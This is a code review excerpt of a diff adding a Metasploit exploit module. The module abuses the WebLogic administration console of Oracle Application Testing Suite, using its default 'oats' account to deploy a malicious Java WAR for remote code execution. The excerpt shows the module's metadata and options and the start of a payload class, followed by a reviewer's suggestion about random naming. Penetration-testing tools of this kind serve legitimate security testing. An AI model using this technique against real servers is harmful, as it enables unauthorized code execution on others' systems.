modules/exploits/windows/http/oats_weblogic_console.rb

```diff
@@ -0,0 +1,388 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
+      'Description'    => %q{
+        This module abuses a feature in WebLogic Server's Administration Console to install
+        a malicious Java application in order to gain remote code execution. Authentication
+        is required, however by default, Oracle ships with a "oats" account that you could
+        log in with, which grants you administrator access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Steven Seeley', # Used the trick and told me about it
+          'sinn3r'         # Metasploit module
+        ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'WebLogic Server Administration Console 12 or prior', { } ]
+        ],
+      'References'     =>
+        [
+          # The CVE description matches what this exploit is doing, but it was for version
+          # 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
+          # ['CVE', '2007-2699']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 13 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
+        OptString.new('HttpUsername', [true, 'The username for the admin console', 'oats']),
+        OptString.new('HttpPassword', [true, 'The password for the admin console'])
+      ])
+
+    register_advanced_options(
+      [
+        OptString.new('DEFAULTOATSPATH', [false, 'The default path for OracleATS'])
+      ])
+  end
+
+  class LoginSpec
+    attr_accessor :admin_console_session
+  end
+
+  def login_spec
+    @login_spec ||= LoginSpec.new
+  end
+
+  class OatsWarPayload < MetasploitModule
+    attr_reader :name
+    attr_reader :war
+
+    def initialize(payload)
+      @name = Rex::Text.rand_name
```

Comment:
Faker is an option for generating a name.
Example from Jenkins Metaprogramming module `Faker::App.name.split(/[^[:alpha:]]/).join`

```suggestion
      name = Faker::App.name.split(/[^[:alpha:]]/).join
```